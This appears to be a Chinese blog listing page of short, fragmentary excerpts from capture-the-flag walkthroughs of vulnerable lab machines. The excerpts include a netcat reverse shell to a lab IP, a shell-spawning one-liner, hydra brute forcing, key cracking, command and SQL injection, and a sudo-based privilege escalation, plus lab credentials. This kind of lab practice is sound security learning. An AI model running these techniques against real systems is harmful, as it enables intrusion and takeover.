自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(16)
  • 收藏
  • 关注

原创 Temple of Doom靶机

nc -e /bin/bash 192.168.1.6 1337 (最好按照这样来,后面还需要其他的端口,别到时后被占了)pty.spawn("/bin/bash")' #交互式shell。尝试着修改cookie得值为:profile={"username":"Admin"},然后对其编码。发现Friday字段前面少了引号,然后我们在对其进行base64编码和url编码。burp抓包,得到profile的值应该为一个url编码和base64编码的值。CTRL+SHIFT+B #base64解码。

2024-08-11 14:42:57 268

原创 Basic Pentesting: 2靶机

得到可能为密码的值heresareallystrongpasswordthatfollowsthepasswordpolicy$$通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。得到两个用户分别是 kay 、 jan对应的就是k用户和j用户。因为端口扫描ssh服务开启,j用户存在弱口令,尝试用九头蛇爆破。cat pass.bak,拒绝访问。得到密码beeswax再次尝试连接。拼接/development/再次查看pass.bak文件。得到密码为armando。

2024-08-10 19:59:11 257

原创 blackmarket靶机

Google搜索 https://bourne.fandom.com/wiki/Operation_Treadstone。访问web服务80端口,发现flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}more IMP.txt发现flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}尝试弱口令---破解出账号密码supplier:supplier。输入得到的密码得到flag6{Um9vdCB0aW1l}名字为Jbourne,密码为?

2024-08-10 14:40:08 390

原创 bob_v1.0.1

查看文件内容 -> 不知道干嘛的,找了点文献才知道是“藏头诗”得到密钥:【gpg -d login.txt.gpg 解密,没有权限。尝试测试漏洞输入whoami,发现存在漏洞。执行whoami | ls ,发现备份文件。robots.txt文件。

2024-08-08 21:14:35 194

原创 w1r3s靶机

访问web服务,拼接扫描出来的目录/administrator/,点击next,发现cuppa cms。开放了四个端口分别是21、22、80、3306。发现了w1r3s用户,尝试能不能获得密码。ssh远程连接,只有w1r3s可以登录。使用john破解,保存到txt文件。anonymous,密码为空。

2024-08-08 20:12:26 319

原创 depthb2r靶机

访问robots.txt,得知该目标为 apche /tomact 8.0.38 ubuntu操作系统上网查找nday,未发现可利用的。执行ls -l/tmp。访问test.jsp。

2024-08-06 08:45:47 154

原创 evilscience靶机

wappalzer指纹识别,操作系统为ubuntu,语言为php。/var/log/auth.log 可以读取日志。利用命令执行(物理机上执行,kali不行)点击about us发现参数进行漏洞测试。开启了ssh服务和web服务。

2024-08-06 08:44:43 283

原创 zico靶机

wappalyzer指纹识别 php语言 ,ubuntu系统。尝试弱口令登录admin 运气挺好 ,试了两个密码。root账户密码: root/34kroot34。尝试文件上传但是找不到文件路径不知道网站目录在哪。zico账户密码 zico/zico2215@翻找js文件,readme文件未发现有用信息。发现可以解析,利用这个漏洞getshell。读取密码文件显示空白肯能是因为没权限。发现后面跟着文件名,进行漏洞探测。获取数据库版本信息查找nday。发现邮件地址保留可能会有用。

2024-08-03 18:31:38 289

原创 sky tower靶机

访问80端口发先登陆框,burp抓包测试,同时进行目录扫描未发现有用信息。查看数据库 show databases;步骤:1.vim /etc/proxychains.conf。进行数据库链接 mysql -u root -p。使用sara登录还是掉出来了,再重新套路来一遍。4.尝试进行ssh登陆时可以携带一条指令。发现数据库账号密码为root/root。查看数据标 show tables;wapplazer指纹识别。3128端口是一个代理端口。3.尝试登陆发现调出来了。

2024-08-02 11:46:34 344

原创 Holynix v1提权

mv 原理 运行sudo tar就相当于运行sudo su,因为su被我们改名成了tar,然后tar又可以被我们sudo免密运行,成功提权。必须用tar czf 压缩为tar.gz后缀文件 上传在虚拟机进行。上传一个正常的图片,出现以下提示,翻译为用户家目录上传已禁用。3.漏洞探测发现有sql注入,用工具梭哈。登陆alamo账户发现有上传文件的功能点。4.获取数据库中的账号密码尝试登陆。将tar命令改为其他名字。尝试切换其他用户登录。

2024-08-02 11:44:57 307

原创 os-bytesec靶机

开启了4个服务访问80端口。

2024-07-14 15:36:03 380

原创 player _v1.1靶机

看到开启了数据库和web服务,访问80和3306端口拼接js接口路径。

2024-07-14 11:53:53 287

原创 os-hacknos-3靶机

看到开启两个端口访问web服务。

2024-07-13 17:07:57 209

原创 os-hax靶机

访问发现页面不正常,url会跳转到locahost下修改host和域名之间的绑定重新访问还是不正常burp设置代理匹配规则再去尝试发现页面正常了发现参数,测试之后没有SQL注入再去拼接刚刚发现的后台尝试弱口令爆破未能登录点击下面返回jrahul页面整个翻译一下,发现有个用户是web,猜解不出密码这时候回退到刚刚目录扫描有一个/img文件,访问有一个flaghostpng下载下来使用strings命令与exiftool工具查询flaghost.png中的关键字 passw@45。

2024-07-12 11:34:38 221

原创 hacknos-reconforce靶机

开放了三个端口。

2024-07-11 19:04:52 222

原创 jangow1.0.1

访问80端口的web服务发现url通过指纹识别发信是ubuntu系统目录扫描查看200状态码文件未找到有用信息。

2024-07-11 10:20:44 327

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除